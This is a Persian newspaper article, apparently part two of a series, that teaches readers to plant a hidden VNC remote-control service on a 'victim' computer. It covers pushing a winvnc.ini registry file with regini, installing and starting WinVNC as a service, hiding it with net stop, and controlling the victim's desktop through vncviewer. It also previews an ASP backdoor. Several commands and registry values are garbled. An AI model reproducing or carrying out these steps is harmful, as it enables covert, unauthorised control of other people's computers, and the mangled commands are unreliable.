آناتومی حمله از نگاهی دیگر (بخش دوم)

اکنون باید مختصری در رجیستری سیستم خود دستکاری کنید. البته زیاد سخت نیست اما احتیاط کنید تا سیستم خودتان نپرد!! فقط یک فایل بسازید آن هم به نام winvnc.ini
کد خبر: ۲۲۵۸۳
و آن را داخل شاخه زیر جا دهید :
HKEY-USERS-\DEFAULT\Software\ORL\winVNC3
socketconnect=REG-DWORD 0*0000008 o*57bf2d2e
o*9e6cb06e
حالا شما کاری که باید انجام دهید این است که این فایل را درون رجیستری سیستم قربانی که قرار است هک شود بگذارید. چندین راه وجود دارد که آسانترین آنها اجرای این دستور است که روی Winvnc.ini جواب می دهد :
"regini-mIP.IP.IP.IPwinvnc.ini"

سپس دستور زیر را که فقط تحت ان تی جواب می دهد را اجرا کنید :
"Winvnc-install"
این از روی دایرکتوری سیستم قربانی بصورت winvne. exe انجام می شود و به حمله کننده جواب می دهد. حالا در استارتاپ کافی است تا "net start winvne" را اجرا کنید ؛ سخت است؛ می بینید که بسیار هم آسان است . برای جلوگیری از این که اومین سیستم قربانی شما را پیدا نکند دستور "net stop winvne" را بکار ببرید. حالا شما هر آنچه را که بخواهید می توانید با vncviewer .exe از روی دسکتاپ سیستم قربانی پیدا کرده و مورد آماج حملات خود قرار دهید. در این بین برای محکم کاری نیز می توانید میانبر زده و از بکدوری موسوم به hw- cmd. asp بهره بگیرید. راه دستیابی به این بکدور و کد آن را در شماره های آتی که نمی دانم کی است توضیح خواهیم داد.

علیرضا خراسانی
khorasani@jamejamdaily.net
newsQrCode
ارسال نظرات در انتظار بررسی: ۰ انتشار یافته: ۰

نیازمندی ها